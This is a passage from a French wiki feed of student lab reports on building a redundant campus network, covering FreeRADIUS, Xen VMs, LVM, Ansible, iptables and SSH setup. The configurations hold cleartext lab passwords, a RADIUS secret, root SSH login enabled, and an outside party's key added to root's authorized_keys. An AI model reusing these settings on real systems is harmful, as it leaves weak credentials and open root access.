&lt;br /&gt;
Configuration du port sur lequel est branché l'AP en mode trunk : &lt;br /&gt;
&lt;br /&gt;
  conf t&lt;br /&gt;
  interface Gi4/2&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
   switchport trunk allowed vlan add 1&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
= Serveur FreeRadius =&lt;br /&gt;
&lt;br /&gt;
Installation de freeRADIUS&lt;br /&gt;
&lt;br /&gt;
 apt install freeradius&lt;br /&gt;
&lt;br /&gt;
On commence par configurer &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; à détailler&lt;br /&gt;
&lt;br /&gt;
 client marguerite {&lt;br /&gt;
 	ipaddr = 10.1.0.4/24&lt;br /&gt;
 	secret = secret_marguerite&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
ensuite &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enabled/eap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 eap {&lt;br /&gt;
   [...]&lt;br /&gt;
   default_eap_type = peap&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
puis &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 root Cleartext-Password := &amp;quot;glopglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug &amp;lt;code&amp;gt;freeradius -X&amp;lt;/code&amp;gt; (après avoir au préalable stoppé le processus)&lt;br /&gt;
&lt;br /&gt;
= Ferme de serveurs Web =&lt;br /&gt;
&lt;br /&gt;
Installation VM xen :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/pra-07.cfg&lt;br /&gt;
&lt;br /&gt;
Configuration IP :&lt;br /&gt;
&lt;br /&gt;
Dans /etc/network/interfaces :&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 172.26.145.102&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
 gateway 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Vérifier si on a bien la passerelle par défaut de configurer &lt;br /&gt;
&lt;br /&gt;
 ip r&lt;br /&gt;
&lt;br /&gt;
On peut pinger le routeur :&lt;br /&gt;
&lt;br /&gt;
 ping 172.26.154.254&lt;br /&gt;
&lt;br /&gt;
Mais pas les addresses ipv4 routée :&lt;br /&gt;
&lt;br /&gt;
 ping 8.8.8.8 échoue &lt;br /&gt;
&lt;br /&gt;
Redémarage service networking&lt;br /&gt;
&lt;br /&gt;
 service networking restart&lt;br /&gt;
&lt;br /&gt;
Si ça n'est pas suffisant :&lt;br /&gt;
&lt;br /&gt;
 ifdown eth0&lt;br /&gt;
 ifup eth0&lt;br /&gt;
 &lt;br /&gt;
Dans /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Redémarage service ssh&lt;br /&gt;
export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 service sshd restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'une clé ssh sur la zabeth et ajout de cette clé dans les clés autorisées de la vm de pra :&lt;br /&gt;
&lt;br /&gt;
 ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -C &amp;quot;aviran.tetia@polytech-lille.net&amp;quot; -P &amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
On copie le contenu de la clé crée :&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_ed25519.pub&lt;br /&gt;
&lt;br /&gt;
On colle son contenu dans les clé authorisées de la VM (fichier ~/.ssh/authorized_keys) :&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/authorized_keys &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Correction de la source list de la VM pour pouvoir utiliser apt correctement :&lt;br /&gt;
&lt;br /&gt;
On remplace les deux dernières lignes par :&lt;br /&gt;
&lt;br /&gt;
 deb     http://security.debian.org/debian-security bullseye-security main contrib non-free&lt;br /&gt;
 deb-src http://security.debian.org/debian-security bullseye-security  main contrib non-free&lt;br /&gt;
 &lt;br /&gt;
Installation de python sur la VM :&lt;br /&gt;
&lt;br /&gt;
 apt update &lt;br /&gt;
 apt install python3&lt;br /&gt;
&lt;br /&gt;
Création d'un venv pour l'éxecution :&lt;br /&gt;
&lt;br /&gt;
 python3 -m venv ~/env-ansible&lt;br /&gt;
 . ~/env-ansible/bin/activate&lt;br /&gt;
 pip3 install -U setuptools wheel&lt;br /&gt;
 pip3 install -U ansible&lt;br /&gt;
&lt;br /&gt;
On crée l'arborescence suivante :&lt;br /&gt;
 &lt;br /&gt;
 └── roles&lt;br /&gt;
    ├── base&lt;br /&gt;
    │   ├── tasks&lt;br /&gt;
    │   │   └── main.yml&lt;br /&gt;
    │   └── templates&lt;br /&gt;
    │       ├── hostname.j2&lt;br /&gt;
    │       └── hosts.j2&lt;br /&gt;
    └── ssh_key&lt;br /&gt;
        ├── tasks&lt;br /&gt;
        │   └── main.yml&lt;br /&gt;
        └── templates&lt;br /&gt;
            └── keys.j2&lt;br /&gt;
&lt;br /&gt;
Dans main.yml :&lt;br /&gt;
 - name: &amp;quot;Setup sshkeys&amp;quot;&lt;br /&gt;
  template:&lt;br /&gt;
    src: keys.j2&lt;br /&gt;
    dest: /root/.ssh/authorized_keys&lt;br /&gt;
    owner: root&lt;br /&gt;
    group: root&lt;br /&gt;
    mode: &amp;quot;0600&amp;quot;&lt;br /&gt;
&lt;br /&gt;
/!\ ne pas mettre de tabulation dans ce fichier, uniquement des espaces&lt;br /&gt;
&lt;br /&gt;
Dans keys.j2 :&lt;br /&gt;
  {% for item in ssh_keys %}&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;{{ item.key }}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 {% endfor %}&lt;br /&gt;
&lt;br /&gt;
Ajout d'une clef dans les variables de groupe group_vars/all.yaml :&lt;br /&gt;
 &lt;br /&gt;
 ssh_keys:&lt;br /&gt;
  # if you don't install this i won't be able to get into your nodes to help you debug :)&lt;br /&gt;
  - name: tmaurice@thonkpad&lt;br /&gt;
    key: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrw78OSJACq5MFXHrhAr2bPpnTNxwLE85mzij8gKmCs thomas@thonkpad&lt;br /&gt;
    # add more keys here&lt;br /&gt;
  - name: aviran.tetia@polytech-lille.net&lt;br /&gt;
    key: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis lancer la commande :&lt;br /&gt;
&lt;br /&gt;
 ansible-playbook -v -i inventory polytech.yaml&lt;br /&gt;
&lt;br /&gt;
Vérification dans le fichier /root/.ssh/authorized_keys  :&lt;br /&gt;
 &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrw78OSJACq5MFXHrhAr2bPpnTNxwLE85mzij8gKmCs thomas@thonkpad &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Nous obtenons bien toutes nos clefs ssh.&lt;br /&gt;
&lt;br /&gt;
Ajout des var d'environement pour pouvoir installer docker :&lt;br /&gt;
&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Installation du rôle Docker :&lt;br /&gt;
 &lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Puis dans polytech.yml :&lt;br /&gt;
&lt;br /&gt;
 - hosts: all&lt;br /&gt;
   roles:&lt;br /&gt;
    ...&lt;br /&gt;
    - geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après ré-execution du playbook, nous pouvons vérifier que Docker est bien installé : &lt;br /&gt;
&lt;br /&gt;
 docker -v &lt;br /&gt;
&lt;br /&gt;
Installation du Pare-feu :&lt;br /&gt;
&lt;br /&gt;
source : https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
&lt;br /&gt;
- création de roles/iptables/tasks/main.yml :&lt;br /&gt;
&lt;br /&gt;
 ---&lt;br /&gt;
&lt;br /&gt;
 - name: Allow ports INPUT tcp&lt;br /&gt;
  iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    protocol: tcp&lt;br /&gt;
    destination_port: &amp;quot;{ { item } }&amp;quot;&lt;br /&gt;
    jump: ACCEPT&lt;br /&gt;
    ctstate: NEW,ESTABLISHED&lt;br /&gt;
  loop: &amp;quot;{ { iptables_accepted_tcp_ports } }&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 - name: Allow ports INPUT udp&lt;br /&gt;
  iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    protocol: udp&lt;br /&gt;
    destination_port: &amp;quot;{ { item } }&amp;quot;&lt;br /&gt;
    jump: ACCEPT&lt;br /&gt;
    ctstate: NEW,ESTABLISHED&lt;br /&gt;
  loop: &amp;quot;{ { iptables_accepted_udp_ports } }&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 - name: Set the policy for the INPUT chain to DROP&lt;br /&gt;
  ansible.builtin.iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    policy: DROP&lt;br /&gt;
&lt;br /&gt;
- Cration du fichier de variables :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 iptables_accepted_tcp_ports:&lt;br /&gt;
  - 8600&lt;br /&gt;
  - 8500&lt;br /&gt;
  - 8501&lt;br /&gt;
  - 8502&lt;br /&gt;
  - 8301&lt;br /&gt;
  - 8302&lt;br /&gt;
  - 8300 &lt;br /&gt;
  - 22&lt;br /&gt;
  - 80&lt;br /&gt;
  - 443&lt;br /&gt;
&lt;br /&gt;
 iptables_accepted_udp_ports:&lt;br /&gt;
  - 8600&lt;br /&gt;
  - 8301&lt;br /&gt;
  - 8302&lt;br /&gt;
  - 22&lt;br /&gt;
  - 80&lt;br /&gt;
  - 443&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=58077</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=58077"/>
				<updated>2022-01-12T16:26:13Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* HTTPS / Certificat SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
==Configuration du SSH== &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
